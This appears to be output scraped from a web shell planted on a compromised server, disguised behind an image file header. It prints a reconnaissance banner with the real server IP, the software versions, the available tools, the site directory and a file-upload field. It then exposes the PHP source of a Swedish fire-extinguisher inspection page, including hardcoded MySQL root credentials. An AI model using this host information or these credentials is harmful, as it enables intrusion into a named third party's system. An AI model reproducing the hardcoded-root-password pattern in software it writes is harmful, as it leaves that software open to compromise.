????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 18.222.153.166 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/www.inspection-online.se/scripts/ |
Upload File : |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Brandsläckare</title> <style type="text/css"> .text { font-family: Verdana, Geneva, sans-serif; } .text td { font-size: 12px; } .fet { font-weight: bold; font-size: 12px; font-family: Verdana, Geneva, sans-serif; } .ee { font-family: Verdana, Geneva, sans-serif; } </style> </head> <body> <table width="1200" border="0" cellspacing="0" cellpadding="0"> <tr class="fet"> <td align="center" width="120">Sprint</td> <td align="center" width="120">Sigill</td> <td align="center" width="120">Slang</td> <td align="center" width="120">Munstycke</td> <td align="center" width="120">Typ</td> <td align="center" width="120">Vikt</td> <td align="center" width="120">Serienr</td> <td align="center" width="120">Tillverkningsår</td> <td align="center" width="120">Tryck</td> <td align="center" width="120" >Kontroll</td> </tr> </table> <?php $link = mysql_connect ("localhost", "root", "root123"); mysql_select_db ("inspection"); $sql = "Select * from symbols"; $result = mysql_query($sql); $posid = 0; while ($row = mysql_fetch_assoc($result)){ $posid = $row['id']; ?> <table width="1200" border="0" cellspacing="0" cellpadding="0"> <tr class="text"> <td align="center" width="120"><?php echo($row['sprint']);?></td> <td align="center" width="120"> <?php echo($row['sigill']);?></td> <td align="center" width="120"><?php echo($row['slang']);?></td> <td align="center" width="120"><?php echo($row['munstycke']);?></td> <td align="center" width="120"><?php echo($row['typ']);?></td> <td align="center" width="120"><?php echo($row['vikt']);?></td> <td align="center" width="120"><?php echo($row['serienr']);?></td> <td align="center" width="120"><?php echo($row['ar']);?></td> <td align="center" width="120"><?php echo($row['tryck']);?></td> <td align="center" width="120"><?php echo($row['kontroll']);?></td> </tr> </table> <?php } ?> <br /> <br /> <a href="excel.php"><span class="ee">Ladda ner som Excel-fil </span> </a> </body> </html>